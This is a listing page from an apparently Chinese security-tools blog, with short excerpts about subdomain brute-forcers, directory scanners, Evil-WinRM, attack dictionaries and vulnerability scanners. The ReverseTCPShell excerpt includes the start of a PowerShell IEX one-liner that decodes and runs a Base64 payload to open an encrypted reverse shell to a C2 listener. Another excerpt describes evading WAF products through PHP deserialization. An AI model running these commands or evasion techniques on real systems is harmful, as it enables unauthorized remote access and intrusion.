- 最新文章
-
Subdomain3:一个子域名爆破工具,IP/C段/CDN等
Subdomain3介绍Subdomain3是新一代子域名爆破工具,它帮助渗透测试者相比与其他工具更快发现更多的信息,这些信息包括子域名,IP,CDN信息等,开始使用它吧!Subdomain3子域名爆破工具截图特性更快三种速度模式.用户也可以修改配置文件(/lib/config.py)来获得更高的速度.CDN识别支持可以判定域名是否使用了CDN.标准C段支持可以对未使用CDN的域名IP进行分类.多… -
Konan – 高级Web目录扫描爆破工具,支持多线程/代理/字典/子目录等
Konan-Web目录扫描程序Konan是一个开源的用于Web目录扫描的工具,针对目录和文件名。类似的还有DirBuster,dirmap等。下面也对其它类似工具的功能对比。Konan目录扫描支持平台LinuxWindowsMacOSX同类工具功能对比功能Konandirsearchdirbgobuster多线程yesyesyesyes支持多扩展yesyesnonoHTTP代理支持yesyesye… -
Evil-WinRM:用于渗透测试的终极Windows远程管理shell
Evil-WinRMSHELLWinRM是什么?WinRM =WindowsRemoteManagement,即Windows远程管理,以下简称WinRM。Evil-WinRMshell介绍此shell是用于渗透测试的终极WinRMshell。WinRM(Windows远程管理)一种标准的基于SOAP的协议,允许来自不同供应商的硬件和操作系统进行互操作。此程序可以在任何启用此功能的Win… -
利用PHP反序列化免杀D盾、安全狗等WAF软件
PHP反序列化介绍在PHP进行反序列化时,会将序列化中的变量传入类中,并且调用__destuct等魔法函数。巧妙应用可达到免杀D盾,过安全狗等WAF软件的效果。TestCode1:输出:xxxxO:1:"A":1:{s:4:"name";s:4:"xxxx";}TestCode2: -
BurpSuite插件AuthMatrix,用于检测越权漏洞问题
BurpSuiteAuthMatrix插件AuthMatrix 是一个BurpSuite扩展,用于检测权限授权问题,设置好session就能进行自动化测试。相似功能的插件还有:BurpSuiteAuthz。Authz会先访问一遍接口抓包,然后“Sendrequest(s)toAuthz”,设置低权限的cookie,“Run”就会使用低权限的cookie去请求,结果会匹配给出相似度百分比,可以查看每… -
ReverseTCPShell 反弹加密shell
一个通过TCP加密(AES256位)反弹Shell的工具,使用PowerShell。使用攻击方(C2-Server监听):PS>.\ReverseTCP.ps1目标(客户端):ECHOIEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEk… -
SaiDict:弱口令/敏感目录/敏感文件等渗透测试常用字典
SaiDict渗透测试字典该项目维护者收藏了弱口令,敏感目录,敏感文件等渗透测试常用攻击字典。用于项目的安全审计与安全检测。渗透测试字典项目目前字典的目录大概分布如下:账户字典|-常用弱密码|-常用账户名|-中国人名拼音|-常用手机号fuzz字典|-LDAP注入|-SQL注入|-XSS攻击|-文件遍历|-XXE|-vul(各种中间件目录)中间件弱口令|-axis弱口令|-tomcat账户|-tom… -
RapidScan – 自动化多工具Web漏洞扫描器
RapidScan漏洞扫描器以往进行安全检测时我们都需要一个接一个的运行安全扫描/审计工具,来收集信息以便进一步修复安全漏洞。但这样做效率太低了,能否实现自动化呢?即运行多个扫描工具来发现漏洞并合为一体,有效地判断误报,相互关联结果并节省宝贵的时间,RapidScan就是这样一款漏洞扫描器。RapidScan漏洞扫描器-帮助RapidScan漏洞扫描器-扫描RapidScan漏洞扫描器-输出报告功… -
Gitrob:GitHub敏感信息泄漏扫描工具
Gitrob是一个Github潜在敏感信息泄漏扫描工具。Gitrob将属于用户或组织的存储库克隆到可配置的深度,并遍历提交历史记录/标记与潜在敏感文件的签名匹配的文件。调查结果将通过网络界面呈现,以便于浏览和分析。界面GitHub敏感信息泄漏扫描WebUI中的评估统计信息和结果查看发现,突出显示问题点二进制文件支持hexdump视图Gitrob使用1gitrob[参数]target[target… -
WeebDNS – 异步DNS枚举工具
WeebDNSDNS枚举工具weebdns是一个使用Python3编写的异步DNS枚举工具,用于测试目的,只能用于的严格授权的测试范围。它比普通工具快得多。DNS枚举工具依赖Python 3.xpip3gitPYTHON3依赖aiohttpasyncioaiodnsWeebDNS安装与使用Ubuntu/debian系统依赖安装1$sudoapt-getinstallgitpython3p…